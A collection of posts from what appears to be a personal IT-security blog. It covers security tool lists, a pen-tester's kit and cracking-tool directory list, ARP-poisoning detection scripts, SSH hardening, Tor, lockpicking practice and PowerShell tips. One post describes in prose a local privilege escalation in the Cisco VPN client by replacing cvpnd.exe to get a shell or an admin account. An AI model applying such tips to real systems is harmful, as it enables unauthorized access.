    Instead, I'd replace #5 with the suggestion to keep backups of all your data on the drive. It is great to not have it stolen, or offer password and encryption options in case it is stolen, but what about the data on the laptop? How much is it worth to you personally? If your laptop is stolen, minimize the damage to only the cost of the hardware and your own stress, not also to the only surviving copies of your son's little league digital pictures or those important sales emails.
    .: eakiu is short for mac software for wi-spy
    I have a Wi-Spy, which is an excellent (and cheap!) spectrum analyzer tool. I saw a mention for it on NetGirl's blog over at ArubaNetworks on her list of cool tools. But I didn't know what EaKiu was in her Wi-Spy bullet. I thought about emailing or commenting, but this seemed to require more effort on my part to converse with her, so I resorted to a Google search for the tool in the hopes that the unique string was easily found. Indeed, I saw that EaKiu is software to display results from Wi-Spy! And boy does it look fucking sweet. Now I just have to find a Mac-user to try it out for me.

    I'd thought that was what EaKiu was, since I'd seen mention of Mac and Linux software back on MetaGeek's old site, but I could never find that information again on the new site design. Of note, the Linux version, while workable, is still pretty ugly compared to Mac or Windows software.
    .: techrepublic list of some free security tools
    Love me tools; love me tool lists as well, especially with new things. The Security Mentor himself was right, this list is pretty cool and has some things I didn't know about! If you look closely, pretty much under each of the ten entries are links to MORE similar free tools. Here are the ones that caught my eye. Note that the list is centered on Windows.

    Secunia Personal Software Inspector - Holy crap! This is an awesome-sounding tool because trying to keep up with what is patched and what is out of date is one of the least-talked about futile and frustrating efforts in the IT back room! I think this one is going to be a priority to try out this weekend. I don't know about licensing, but I bet you can buy just one copy for business and use it on a base workstation image that has all your applications installed, then use it as your reference. That's money right there!

    GMER anti-rootkit - This tool looks really cool, and if it doesn't require an actual installation routine, will likely make it into my desktop toolkit alongside Spybot, Sysinternals tools, and so on. If it requires an install, it could still be useful as another incident response investigation tool. Now, someone needs to make Tripwire free on Windows...

    File Shredder - I like the idea of File Shredder, but I'm not sure I really need it. It's not like I am storing illegal or hugely private junk on my systems, and I certainly have no intentions of selling or giving away my disks anytime soon (like any geek, I can and will find uses for everything). Still, it's nice to have one in the pocket if the need arises.

    Other tools are iffy to me. I'm not a huge fan of loading my web browser with toolbars and plugins. Anything extremely useful really should get built into the browser eventually. I like seeing more options for IE, especially since my love for Firefox has dwindled as it has gotten bigger, slower, and buggier in the past year. Yes, loading up Firefox with testing/security plugins is awesome, but that's a special purpose and I don't need to browse with them always loaded. The only ones I use regularly are NoScript (only recently!), Tor, a client banner changer (I can't think of the damned name for it right now!), and a plugin that displays the target site IP address at the bottom.

    For web privacy stuff, just learn how to empty the cache and where else stuff is stored along with browser and OS tracking options. Yeah, that's not enough, but I've got a bias against cleaners. For new system crapware, learn how to welcome your new system into your home with a quick enema (format and reinstall).

    .: notes on crontab including redirecting output
    Kevin van Zonneveld has posted some notes on using crontab. I don't use crontab enough, which means I always have to look up the time settings. However, that is easily done via Google. What I really liked about Kevin's notes dealt with handling the errors and pointing them to a file rather than the user's mailbox. I can see reasons for doing it either way.
    .: radajo's common misconceptions on arp cache poisoning
    I don't usually pimp sites, but every now and then I see a blog that looks very cool to follow. RaDaJo seems to be an excellent site to add to my feed. Of note, I got linked to their ARP cache poisoning misconceptions post. As a bonus, check the comments for two more links, one to an awesome GIAC paper that is basically everything you'll ever need to know about ARP poisoning, and the Oxid.it link as well. Maybe all that is left is more details on how to detect ARP cache poisoning, but Raul Siles may have covered that in his paper. I see he has a remediation section, but I've not gotten there yet. Arpwatch/Arpalert...anomalous trends in ARP traffic...
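    As an added example (not from RaDaJo's post or Siles' paper), here are two arpwatch-style checks in POSIX shell run over constructed `arp -an` snapshots: a mapping whose MAC changed since a known-good baseline, and one MAC answering for several IPs. All addresses and interface names are made up.

```shell
#!/bin/sh
# Added example (not from RaDaJo's post or Raul Siles' paper): two checks in
# the spirit of arpwatch, run over constructed snapshots of a host's ARP
# cache in `arp -an` format. Addresses and interface names are made up.

SAMPLE_DIR=$(mktemp -d)

# Baseline captured while the LAN was known-good (constructed).
cat > "$SAMPLE_DIR/arp.baseline" <<'EOF'
? (192.168.1.1) at 00:11:22:33:44:01 [ether] on eth0
? (192.168.1.10) at 00:11:22:33:44:0A [ether] on eth0
? (192.168.1.20) at 00:11:22:33:44:20 [ether] on eth0
EOF

# A later snapshot: the adapter behind 192.168.1.20 now also answers for the
# gateway address, a new host appeared, and one entry never resolved (constructed).
cat > "$SAMPLE_DIR/arp.now" <<'EOF'
? (192.168.1.1) at 00:11:22:33:44:20 [ether] on eth0
? (192.168.1.10) at 00:11:22:33:44:0a [ether] on eth0
? (192.168.1.20) at 00:11:22:33:44:20 [ether] on eth0
? (192.168.1.30) at 00:11:22:33:44:30 [ether] on eth0
? (192.168.1.40) at <incomplete> on eth0
EOF

# Reduce `arp -an` lines to "ip mac" with lower-case MACs; unresolved
# (<incomplete>) entries are dropped so they cannot show up as changes.
arp_normalize() {
    sed -n 's/^? (\([0-9.][0-9.]*\)) at \([0-9a-fA-F:][0-9a-fA-F:]*\) .*/\1 \2/p' "$1" |
        tr 'A-F' 'a-f'
}

# Compare a snapshot ($2) against the baseline ($1). Prints
# "ip old_mac new_mac" for a changed mapping (arpwatch's "changed ethernet
# address") and "ip - mac" for an address not in the baseline ("new station").
# An empty baseline reports nothing.
arp_changed() {
    base=$(mktemp); now=$(mktemp)
    arp_normalize "$1" > "$base"
    arp_normalize "$2" > "$now"
    awk 'NR == FNR { seen[$1] = $2; next }
         !($1 in seen)                  { print $1, "-", $2 }
         ($1 in seen) && seen[$1] != $2 { print $1, seen[$1], $2 }' "$base" "$now"
    rm -f "$base" "$now"
}

# MACs that answer for more than one IP in a snapshot: "mac ip ip ...".
# A single adapter may legitimately hold several addresses, so this is a
# lead to verify; a workstation's MAC sitting on the gateway's IP is the
# picture cache poisoning paints.
arp_shared_mac() {
    arp_normalize "$1" | awk '{ ips[$2] = ips[$2] " " $1; n[$2]++ }
        END { for (m in n) if (n[m] > 1) print m ips[m] }'
}

echo "== changed or new mappings =="; arp_changed "$SAMPLE_DIR/arp.baseline" "$SAMPLE_DIR/arp.now"
echo "== MACs claiming several IPs =="; arp_shared_mac "$SAMPLE_DIR/arp.now"
```

    Feed the functions real snapshots (`arp -an > file`) taken a few minutes apart to get the same two reports on a live segment.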
    .: pen-testing lists
    Peter Wood posted two lists to the SecurityFocus pen-test list recently, which I wanted to capture and reproduce here. Feel free to ignore this post.

    First, Peter listed a bunch of tools and hardware he takes for on-site work:
    1. Test laptop
    2. Spare laptop
    3. 4-way mains extension lead with regular plug and plug for computer room racks
    4. Selection of Ethernet cables and couplers
    5. Ethernet / Token Ring adapter (yes, there are still Token Ring users out there!)
    6. Mini hub
    7. Cisco console cable
    8. Cross-over cable
    9. External USB hard drive containing rainbow tables
    10. USB key for backups
    11. DOS bootable USB key
    12. Selection of bootable CDs (Ophcrack Live, PasswordChangerPro, NTFSreader)
    13. DVD containing copy of all my source files
    14. Windows 2000 CD (for rebuilds!)
    15. Swiss Army cyber tool
    16. Spare laptop hard drive
    17. Kensington lock (to comply with client policy if laptop left on site overnight)
    18. Vodafone 3G card for Internet access if there's no wireless
    19. Laptop mouse x2
    20. Mini USB hub
    21. Modem cable and adapters (just in case!)
    22. Magic markers
    23. Blank CDs
    24. Wheelie bag to carry it all in!

    Second, he listed the directories found on the above-mentioned DVD of tools:
    Absinthe
    AccessChk
    AccessEnum
    Achilles
    Active-at
    adminpak
    Amap
    APak
    AppDetective
    ARPsniffer
    ATA HD password
    Athena
    ATK
    Beat LM
    Buffer Overflow Utility
    Cachedump
    cain and abel
    Cerberus
    C-Force
    Checkpoint-Rules
    Chntpw
    Cisco IOS HTTP Vuln
    Citrix clients
    Cobra
    CommView
    CookieViewer
    Copernic
    Core Impact
    CRACKERS
            aefsdr
            AOPB
            AOPR
            APDFPRP
            Brutus
            CacheDump
            CMOSpwd
            IPR (Lotus Notes)
            John the Ripper
            L0phtcrack
            LCP
            LMCrack
            Lotus Notes Key
            LSASecretsDump
            MBSA
            NTPWD
            Ophcrack
            Passwd - recovery FULL
            POPcrack
            PWLTOOL
            SAMInside
            AZPR
    Crowbar
    Crypto4
    CUPASS
    Data Thief
    Dell laptop cmos erase
    DHCP Find
    Dictionaries
    Dumpsec
    EFSdump
    Essential NetTools
    Ethereal Windows Version
    Exploits
    FGdump
    Flash Decompiler
    GetAcct
    GetUserInfo
    GTwhois
    Hydra
    Hyena
    IDserve
    IKE-scan
    iShadow
    KarenWare
    Katapulta
    LAN Surveyor
    LANguard
    LDAP Miner
    LG
    Locksmith
    Maestro
    Member of
    Metasploit
    MingSweeper
    MSRDP client
    MySQL query browser
    NBTdump
    NBTscan
    Nessus
    Netalert
    NetBiosSpy
    Netcat
    NetScanTools Pro
    Network Protocols Handbook
    NetworkView
    niktoogle
    Nmap
    NT Recover
    NTFS Reader
    NTFSDOS
    NTFSRead
    Oat
    ObiWaN
    oracle-sql-injection
    Paros
    PasswordsPro
    Protected Storage PassView
    Protos
    PsLogList
    Putty
    PwdChangerPro
    pwdump
    Rainbow crack
    RegBrws
    Rempass
    RPC scan
    RPC Tools
    SAMdump
    SamInside
    SamSpade
    ScoopLM
    SecuRemote client
    ShareEnum
    SID
    Siphon
    SiteDigger
    SiVuS
    SmartWhois
    SMB Audit Tool
    SMBcrack
    SNMPing
    SNScan
    SNSI
    SOAPbox
    SoapMonitor
    SolarWinds
    Somar
    SPIKEproXy
    SSL Proxy
    Streams
    Subnet Calculator
    Superscan
    SWB
    Sysinternals
    SysRQ2
    Tamper
    Tools4Ever
    Trojans
    twwwscan
    UBCD
    Ultimate Boot CD
    Unicorn Scan
    URL discombobulator
    USB boot
    USBAuditor
    Visual Web Spider
    VNC
    VOIP TESTING
    WAR DIAL
    WebDAVExplorer
    WebInspect
    WebScarab
    WebSleuth
    WinSID
    WIRELESS
    Wireshark
    WPI
    Zlash
    .: accessing ssh over the web
    I'm not sure what to think about GoToSSH.com either. While this is something I've been kinda wondering when it would find a web interface (and likely has others, I just don't know them), I'm not sure I would use it. I certainly would not use it for anything sensitive in nature. It doesn't look like it supports certificates, but simply username/password challenge instead. This may make it somewhat moot to block outbound SSH anymore... (Yes, it always has been moot since it could use any port, but still...) Might be a site worth bookmarking or blacklisting depending on your view.

    Network security continues as holding sand...

    Snagged from Alex.
    .: easy cisco vpn client priv escalation vuln
    The Cisco VPN client for Windows has an interesting advisory out today. The local file cvpnd.exe (C:\Program Files\Cisco Systems\VPN Client) allows a user to replace the file with something else and have it executed with Local System privs. Replace this with a quick script that launches a shell (or does anything else you want) before launching the real cvpnd.exe. I prefer just creating a quick admin account that I control. That's a nice little pocket-exploit to keep in mind, especially since plenty of systems get an initial install of the Cisco VPN and never get updated again for the life of it.

    More information is posted on Cisco's site. I saw this pass by the Full-Disclosure list. Local priv escalations don't get much easier...
    .: hackerspaces
    Networking is amazingly potent right now in our field. We have an amazingly growing number of XXXsec get-togethers in major parts of the country where like-minded geeks and security nuts can get together to hang out, share war stories, push technology to new limits, or just make new friends. Cons are still popping up here and there, and I think they truly are some of the highlights of the year for many a geek.

    This has been growing on me, and I am enamored by the concept. Dan Kaminsky has been espousing the idea of "hackerspaces" on his romp through Europe. Hackerspaces are basically places set up where like-minded people can go and hang out, do things, fraternize, and all in a creative and supportive environment. Basically if you like coffee, you hang out at a coffeeshop and chill out; if you like reading, you hang out in a bookstore; if you like video games, you might try out a cyber bar or two with the buds or adopt someone's basement as your playpen. Why not a hacker/geek/technology sort of space? It is an amazing idea, especially for someone like me who lives in a "networking-starved" middle of the country.

    Metalab is one that Dan posted a link for. This concept is also a project of the Hacker Foundation. I hope Dan and the Hacker Foundation both continue to bring this to our attention; heck, the idea of presenting slideshows of his romps might be a nice shift of pace for Dan to present about! :)

    I also think there is room for hackerspaces as a smaller concept. For instance, I bet many of us have decked out our offices (either cleanly or cluttered and dark!) at home in a way that best suits our work and helps our creativity. For instance, I tend to have black lights and other glowing things in lieu of lights (along with the glow of monitors, of course) in my workspace.

    As a side thought, it is interesting that for such a virtualized culture as we have, and as much as we work and live on the net, we still (for the most part) desire physical proximity with like-minded persons.
    .: wireshark dos can lead to a more aggressive defense
    Someday (not soon!) I'll likely satisfy a curious project of mine in making a more aggressively defensive network. And vulnerabilities like the recently posted Wireshark MMS DoS are a perfect example of having a slightly more dangerous network to interlopers. Put up an outdated Wireshark sniffer while I randomly send out these packets and you won't get too much. Especially anyone who uses live cds with outdated software. In this case, it is not necessarily about protecting devices and data, but actively knocking off rogue intruders.
    .: skype outage blamed on windows reboots...yeah right
    Skype was down late last week for about 3 days or so. And not just every single user, but also downloads of the software on their site. This was supposedly due to a software algorithm update or something like that. Today I read this was due to the massive reboot of Microsoft Windows computers the night previous. TheRegister also has some info up, and is a little more cohesive.

    I call bullshit. This is curiously close to poc code released that supposedly (I say that because I've not tested it, nor could anyone else since the servers were down) would freeze a Skype server, then move to the next one, and so on. It was posted to SecurityLabs.ru. If true, that is certainly a critical, fatal, flaw.

    1. A security issue to Skype would be a very, very big deal. One of the biggest contention points with Skype use is its security. I'd do everything in my power as well to protect that, such as shut off all servers and all users and all downloads in an effort to hide the insecurity issue.

    2. The Windows reboot shouldn't have occurred as late as it seemed like Skype was down. The reboot should occur Tuesday evenings in the dead of night, for automatic users, and at various times. I don't think Skype was down until Thursday...

    3. Why now? Why this month? Why not the last few months?

    4. And Skype is going to tell us that a mass reboot of users exposed a vulnerability in the availability of their world class system? You have really got to be kidding me... But as much as that can be egg on their face, I would weigh that less than a security incident. Nonetheless, I can't imagine the overhead of reconnecting to Skype truly caused such a showstopping event on the service's login servers. I wonder how many Skypes get turned on every morning anyway?

    Ever informative, the Internet Storm Center has an ongoing post which raises similar questions and more. I really like the thought that Skype needs Windows users to log in, so that means all these millions of users all had their machine auto-login? Again, right.
    .: passive network mapping from cisco
    For future reference, Cisco released a passive network mapping tool called SMART, Safe Network Mapping And Reporting Tool.
    .: installing ssh on ubuntu 7.04 feisty

    I don't think I posted it, so I thought I would jot down installing an SSH server on Ubuntu 7.04 (Feisty).

    sudo apt-get install ssh
    gksudo gedit /etc/ssh/sshd_config

    Change PermitRootLogin to no and change Port to the desired port number. Add a new line at the bottom, "AllowUsers username", where username is the account you want to allow. You can also use "DenyUsers username", but once AllowUsers is set, all other users are denied anyway.

    Next, I want to add a little brute-force protection using pam-abl. These instructions may not be current, but they worked out for me. Add "deb http://ubuntu.tolero.org/ edgy main" to your /etc/apt/sources.list file. Remember to open it as root so you can save it. And yes, I am using edgy instead of feisty in this line.

    sudo aptitude update
    sudo aptitude upgrade
    sudo aptitude install libpam-abl
    sudo /etc/init.d/ssh restart

    Run "sudo pam_abl" to list the current blacklist, and use --help for more features or manual blocking. Failed logins are collected in /var/lib/abl. SSH logs are written to /var/log/auth.log, but it may be useful to increase the logging level and change the location. Change "LogLevel INFO" to "LogLevel VERBOSE" to get more out of the logging.

    Further hardening can be done. The files /etc/hosts.allow and /etc/hosts.deny will allow or deny the listed client hosts respectively. These lines will allow two IP address ranges to connect to sshd but deny all others.

    # /etc/hosts.allow
    sshd: 10.10.10.0/255.255.255.0
    sshd: 192.168.1.0/255.255.255.0

    # /etc/hosts.deny
    sshd: ALL

    Referenced Tolero.org for the pam-abl install. I also note an Ubuntu help file.
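    As an added example (not part of this post or the Tolero.org and Ubuntu pages it references), a POSIX shell script that checks a sshd_config for the settings above, counts failed logins per source address from auth.log lines, and tests an address against the hosts.allow entries. Every input file is a constructed sample; the user name, port number and addresses in them are made up.

```shell
#!/bin/sh
# Added example (not from the original post): audit a sshd_config for the
# settings described above, count failed logins per source from auth.log
# lines, and test an address against the hosts.allow entries. Every input
# file is a constructed sample written under $SAMPLE_DIR, so this runs offline.

SAMPLE_DIR=$(mktemp -d)

# sshd_config before the edits described above (constructed).
cat > "$SAMPLE_DIR/sshd_config.before" <<'EOF'
Port 22
Protocol 2
PermitRootLogin yes
LogLevel INFO
EOF

# The same file after the edits (constructed; port and user are made up).
cat > "$SAMPLE_DIR/sshd_config.after" <<'EOF'
Port 2222
Protocol 2
PermitRootLogin no
LogLevel VERBOSE
AllowUsers kevin
EOF

# auth.log-style lines (constructed; host, users and addresses are made up).
cat > "$SAMPLE_DIR/auth.log" <<'EOF'
Aug 20 22:14:01 feisty sshd[4321]: Failed password for invalid user admin from 10.10.10.77 port 50234 ssh2
Aug 20 22:14:03 feisty sshd[4321]: Failed password for invalid user admin from 10.10.10.77 port 50235 ssh2
Aug 20 22:14:05 feisty sshd[4325]: Failed password for root from 10.10.10.77 port 50236 ssh2
Aug 20 22:15:10 feisty sshd[4330]: Accepted publickey for kevin from 192.168.1.20 port 40100 ssh2
Aug 20 22:16:00 feisty sshd[4333]: Failed password for kevin from 192.168.1.20 port 40101 ssh2
EOF

# The two hosts.allow lines from the post.
cat > "$SAMPLE_DIR/hosts.allow" <<'EOF'
sshd: 10.10.10.0/255.255.255.0
sshd: 192.168.1.0/255.255.255.0
EOF

# Effective value of one sshd_config keyword: sshd takes the first match,
# keywords are case-insensitive, and lines starting with '#' are comments.
sshd_opt() {
    awk -v key="$2" '$1 !~ /^#/ && tolower($1) == tolower(key) { print $2; exit }' "$1"
}

# One line per gap against the settings recommended above; prints nothing
# when the file already has all of them.
audit_sshd_config() {
    port=$(sshd_opt "$1" Port)
    [ "$(sshd_opt "$1" PermitRootLogin)" = "no" ] || echo "PermitRootLogin is not 'no'"
    [ -n "$(sshd_opt "$1" AllowUsers)" ]          || echo "no AllowUsers line, so every account may log in"
    [ "$(sshd_opt "$1" LogLevel)" = "VERBOSE" ]   || echo "LogLevel is not VERBOSE"
    [ "${port:-22}" != "22" ]                     || echo "sshd still listens on the default port 22"
}

# Failed password attempts per source address, most frequent first
# ("count address"): the per-host failures pam_abl counts before blacklisting.
failed_logins_by_ip() {
    grep 'sshd\[[0-9]*\]: Failed password for' "$1" |
        sed 's/.* from \([0-9.]*\) port .*/\1/' |
        sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Dotted quad to an integer so net/mask entries can be compared.
ip2int() {
    echo "$1" | { IFS=. read -r a b c d; echo $(( a * 16777216 + b * 65536 + c * 256 + d )); }
}

# Does address $1 match an sshd entry in hosts.allow-style file $2? Handles
# ALL, single addresses and net/mask entries like the two above (not the
# other tcp_wrappers forms); returns 0 when allowed, 1 otherwise.
tcpd_allows() {
    addr=$(ip2int "$1")
    for entry in $(sed -n 's/^sshd:[[:space:]]*//p' "$2" | tr ',' ' '); do
        case $entry in
            ALL) return 0 ;;
            */*) mask=$(ip2int "${entry#*/}")
                 [ $(( addr & mask )) -eq $(( $(ip2int "${entry%/*}") & mask )) ] && return 0 ;;
            *)   [ "$entry" = "$1" ] && return 0 ;;
        esac
    done
    return 1
}

echo "== gaps in sshd_config.before =="; audit_sshd_config "$SAMPLE_DIR/sshd_config.before"
echo "== gaps in sshd_config.after ==";  audit_sshd_config "$SAMPLE_DIR/sshd_config.after"
echo "== failed logins by source ==";    failed_logins_by_ip "$SAMPLE_DIR/auth.log"
```

    Point the functions at the real /etc/ssh/sshd_config, /var/log/auth.log and /etc/hosts.allow to get the same report for a live box.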

    .: social networking sites and the workplace
    Rebecca got me thinking this afternoon about her post on how business and even schools may or are forming sanctions against their users of social networking sites.

    It really sucks thinking about stuff like that, and I encourage reading the post and links she gives. I really feel that while some of that stuff is useful for hiring managers looking for appropriate team members, most of that stuff should belong to the realm of the individual. The exceptions being documented and reported harassment and disclosure of sensitive information. I also don't mind hiring managers using such sources of information to determine if a potential employee may be a good fit. That's cool too, in my books, namely using it to learn about someone a bit more.

    Take this example. I have a few Suicide Girls t-shirts (I'd link, but it's not work safe) which I don't mind wearing (of note, they're the most comfortable t-shirts I've ever owned) out in public. I'm not a member, but I used to be back when I knew people on the site, a bit before they got "big." So that kinda illustrates a slight individual taste for me, or at least openness (especially to comfy t-shirts!!). While out and about, I might run into people that know me well enough to know where I work. I may meet others to whom I give out business cards that have my company name on them. This is very similar to how people may stumble upon my inappropriate MySpace site (no, I don't really have one) and connect my company to the person's habits.

    It's just life, and that's how we are outside of work in our personal lives. We all have some things we'd rather not air out, on either side of the fence. And I really think trying to police social networking sites (which is really trying to steal individualism away from employees and enforcing Thought Police) is futile and detrimental to our culture as a whole.

    If my company president saw me out in the street on a Saturday with my Suicide Girls shirt on, the earring I can't wear when at work, and doing a wireless site survey on open wireless networks in the area just because I can, I'd hope that he'd be able to smile, say hi, and not let that carry over professionally or try to change who I am. Anything less is superficially shallow, in my books.
    .: zonealarm local priv escalation
    In a similar vein to last week's Cisco VPN client privilege escalation vulnerability, ZoneAlarm is also susceptible to executable file replacement.

    Sadly, this isn't 1998 anymore, and I don't personally know anyone who still uses ZoneAlarm...
    .: wikiscanner
    Check out WikiScanner if you want to pry a little bit. Use your own company name (and variations!) to see what people at your office have been doing on Wikipedia. Kinda puts some things in our digital world into perspective. He's pretty busy right now, so you might have to reload the query a few times. When you get good hits, you'll see a button that says something like "Wikipedia edits, ahoy!" Click it, then click the number links to expand a new frame with the edit itself.
    .: using silc and tor on ubuntu 7.04 feisty
    Silc is a secure chat network, much like an IRC network, only the communication channels are actually encrypted. However, you can still leak out your normal host, which steals away any shot at anonymity. But if you use Silc with Tor, you achieve not only privacy in the channel, but privacy in the connection as well. Nice! As I've seen it said, silc+tor may be the most secure way to communicate with someone on the net. (Yes, I guess you can add an exchange of keys to verify identities...)

    First, install Silky. I am doing this work in an updated but newly installed Ubuntu system. Make sure the repositories are unlocked, which should be the first thing done with any Ubuntu install.
    sudo apt-get install silky
    This will actually also flag and get any dependencies like libsilc.

    Start Silky either by typing "silky" into the shell or Applications->Internet->Silky. Being the first time run, it will want to generate keys. Automatic is sufficient. Close out, and let's look into Tor.
    sudo apt-get install tor privoxy tsocks
    Again, the needed dependencies will be installed. We can then start Tor and call Silky.
    torify silky
    Click Server, and select a server or supply one you know under Preferences->Edit Preferences. Nothing special needs to be submitted, just use whatever address and port used normally. Connect, and check out the hostmask. That's it! Other programs can start this way as well, such as "torify firefox" and then go to whatismyip.com and verify the external IP (there is a Tor extension which works beautifully, though).

    Keep in mind that Tor is not the fastest of connections, and while IRC is pretty resilient, I've found SILC to be a bit more picky about some slowness. I've found Silky can stay up for a few days, but Torify (tsocks) eventually dumps out, so it is not something I'd expect to always leave on.

    Now, if someone knows how to implement irssi+silc_plugin (or any silc plugin)+tor, I'd love to hear how! That way I could possibly stay connected on a server using screen to attach whenever I want. Granted, I think I'd need two irssi's since Freenode only wants Tor users to use their special private entrance.

    More stuff to Torify can be found on the web.
    .: hubs, hubs, everywhere, and not a 10/100 to wire
    Looked for a 10/100 (or /1000) ethernet hub lately? I hadn't either until today. I found it surprisingly difficult to find a hub. Most searches pull up USB hubs, while the rest tend to recommend switches. Great, but I want a hub (or a network tap, but the cost difference is obvious). The only hub I did find in my quick searches today was a $40 job at CompUSA. Forty bucks?! Maybe I'm cheap about certain things, but a 10/100 hub shouldn't be $40.
    .: honeypots in the internal network
    Roger A. Grimes wrote recently about using a honeypot in the internal network to catch maldoers (am I alone in feeling a bit naughty after seeing the pic of Roger and honey?). I think this approach is a little heavy-handed, even for a throw-away machine. A full-blown honeypot is a bit of an interesting approach to the problem of detecting intrusion. If staff cannot detect intrusions on their real systems or on the network, they're not going to wield a honeypot correctly. And if they do catch someone probing the honeypot, they are already beyond having a problem.

    Now, that's not to say I discredit this approach. I'm all for multiple barriers, detections, defenses, and using spare time and resources (even throw-away junk) for any little bit that can help. In fact, in a previous job I had a really old workstation that I opened a share on and configured a few port listeners on. This box was a crude honeypot/detection box that could alert me if something was scanning certain ports (namely 1434) or something was depositing malicious files on the open share (we had a couple of these outbreaks when I first joined up). Not really a honeypot, but it was a box meant to simply trigger an alarm in an environment that was cash-strapped from a back room standpoint. Honeypots seem more geared towards human attackers, as opposed to automata, which are more often the culprit.

    So, I'm not disagreeing with the approach in total, but I would caution that honeypots internal will indicate something bigger is happening, and there really should (if you can get the budget for it) be other measures in place on the network and real systems to detect intrusions or naughty activity, even if they are just little tripwires or detectors.

    The article also gives some nice tools, and I've already picked up that book mentioned and hope to get started on it in the coming months.
    .: security buzzphrases make newborn puppies cry
    It may be cute to complain about business buzzphrases, but we have our own stupid, inane little buzzwords as well. I really hate hearing meaningless maxims like "compliance is a process, not a product." No shit, but don't we purchase products to support processes? Maybe security should be idealistic and ephemeral, something we can feel good about in our heads but not actually do anything about...but I guess that's not me. This maxim can be used to attack any product anywhere in our field...making it rather meaningless. I prefer saying something to the effect that, "tools won't create process, process comes first" or "a tool will not solve our problems in the absence of a process." That sort of statement isn't something I can use to attack the idea that NAC can be at least partially justified by compliance efforts. Let's say I do have the process and NAC is my tool to streamline it? Fratto has a point that NAC has a number of drivers behind it, but he is wrong to denounce an arbitrary one using an inane, meaningless buzzphrase.

    Saw this from Rothman's daily incites.
    .: wil wheaton pax keynote for gamers
    Wil Wheaton (I've been a closet fan of his for years, after TNG) gave an excellent keynote recently at PAX. OCMod actually has the full audio up. If you're a gamer of any kind, or once was in your youth, this keynote is worth listening to. Scroll down to the bottom for the full audio (good quality), or just read the article for highlights. Scored this from HARDOCP. You know, the idea of opening an old school arcade would be something I'd readily do given spare cash...
    .: $182 per record is garbage and needs tossed
    The newly revived Mogull (and he's not a zombie!) states that the $187 per lost record number is garbage. He's right, but let's throw two more logs in.

    1. Try to tell anyone who has had their identity stolen or funds maliciously charged to their credit cards that their record is worth only $187. Even those people who have just seen a few pennies charged and flagged by the credit card company could "suffer" more in the thought of what can now happen. I've seen firsthand a few rather scared acquaintances after seeing such a test charge...

    2. Let's say you're a medium-sized company but you have only a few very large clients. If you have a breach and let's even just say 2 people, who happen to be your main client executives, decide that breach was damaging and drop your business. This could have devastating effects. Granted, this isn't a "retail" store, but let's just forget quoting too many statistics and numbers lest we lose sight of the real issues.
    .: practice, practice, practice
    Practice, practice, practice. This recently came up in a SecurityCatalyst forums thread from Cutaway. You practice until reactions to incidents are automatic. Not only that, but you practice to become better acclimated to something, whether that be a skill or simple knowledge. If you check your internet usage levels or network utilization every day, you get a really strong feel for what to expect. This means one can isolate anomalies much quicker. If you do some lockpicking for an hour every day, eventually you will acquire a feel for doing it quicker, which can expand into being able to tackle tougher locks...

    Practice, practice, practice... Professionals need to never forget the basics and the fundamentals of what we do (I know too many who hate the drudgery of such tasks...). Think of it like keeping a finger or monitor on your heartbeat for spot-evaluations or for emergency hospital stays....
    .: practicing illustrated
    Speaking of lockpicking and practice, I actually have been practicing my lockpicking recently. I'll bring a practice lock and a few picks with me to a coffeeshop or movie theater and pick away at it for small chunks of time or before the movie starts. Sometimes I will do so while watching a movie or television at home. Today I was actually able to pick 2 of my 5-pin locks pretty quickly, multiple times. And these were locks I wasn't terribly familiar with yet. That's a pretty big step for me!

    Practicing lockpicking has allowed me to go from being a blind raker who gets lucky, to being able to better feel the matching of the pins and which ones are not yet locked. It has also given me my own ability (technique) to determine pin-counts before applying any torque and make guesses when a pin is locked too high or which one is just barely keeping the cylinder from turning.

    Of note, I have a simple 21-piece lockpick set that I ordered for about $45, plus a series of practice locks that I found on ebay. I think the locks are about a total of $100, and I have 9 of them. Three of them are cut-away locks so I can actually see the pins. Two of the locks are 3 pins, the rest 5-pins, and I even have a 5-pin spool lock. I highly recommend grabbing a couple cut-away practice locks if you are just starting out, as that really helps.
    .: i'm only happy when it rains
    Michael Santarcangelo poses an interesting question and analogy to the IT security world: do you dance in the rain? Now, you probably won't catch me dancing in the rain unless I'm at an outdoor concert, but I'm definitely not a scurrier, even if I'm wearing a light shirt headed to an important meeting in the pouring rain. Screw the umbrella; enjoy nature's weather, even if it can be temporarily painful in the winter; you won't die. (Ok, so if you're out in the wilderness camping or hiking, you should be careful, but in an urban setting, you're not going to die.)

    But Michael's right, do what makes you happy and gives you passion. It might be a little weird, but happiness begets productivity, and ultimately, we're all more than just our jobs. Keep the optimism. The enthusiasm, while looked at askance by some others, will be respected and rewarded eventually.

    Considering our jobs in IT and security, we sometimes don't get our adrenaline pumping until there is an incident. Perhaps that means we might only be happy when it rains? :)
    .: powershell: removing items from an array
    I've been working again with PowerShell, doing some new things. There are still a few nuances to a newbie like me. For instance, while it is easy to create arrays, it is a bit more arcane to remove items from an array. Thankfully, I found a site that gave me the answers I need.

    To remove the first item in an array, reassign only items 1 through the length of the array back into the array (or a new array). Remember that arrays are indexed with the first item as 0, not 1.
    $array = $array[1..$array.Length]
    .: powershell nuance with appendchild to an empty parent
    I have adopted the use of xml files as configuration files for any PowerShell scripts I've been writing for work lately. Today I just found an odd bit of behavior when working with building a new xml file (if the script runs and sees no existing xml config file, it creates one). Normally, adding child objects in xml is fairly straightforward. Assume this is the existing xml.
    <installcontrol>
       <serverlist>
          <server>
             <servername>ALDARAAN</servername>
             <servername>TATOOINE</servername>
          </server>
       </serverlist>
    </installcontrol>
    We can use this script to add a new child server, DANTOOINE.
    [xml]$xmlFile = Get-Content $xpath
    $objNewServer = $xmlFile.CreateElement("server")
    $objNewServerName = $xmlFile.CreateElement("servername")
    $objNewServerName.InnerText = "DANTOOINE"
    $objNewServer.AppendChild($objNewServerName)
    $xmlFile.installcontrol.serverlist.appendchild($objNewServer)
    $xmlFile.Save("$xpath")
    This is great, but what if there are no child objects already present, such as in this xml file?
    <installcontrol>
       <serverlist>
          <server>
          </server>
       </serverlist>
    </installcontrol>
    PowerShell complains that it can't append a child to a string. The script needs to change slightly to accommodate this. The following snippet will work both for empty parents and also populated parents. The difference is in the 6th line.
    [xml]$xmlFile = Get-Content $xpath
    $objNewServer = $xmlFile.CreateElement("server")
    $objNewServerName = $xmlFile.CreateElement("servername")
    $objNewServerName.InnerText = "DANTOOINE"
    $objNewServer.AppendChild($objNewServerName)
    $xmlFile.installcontrol["serverlist"].appendchild($objNewServer)
    $xmlFile.Save("$xpath")
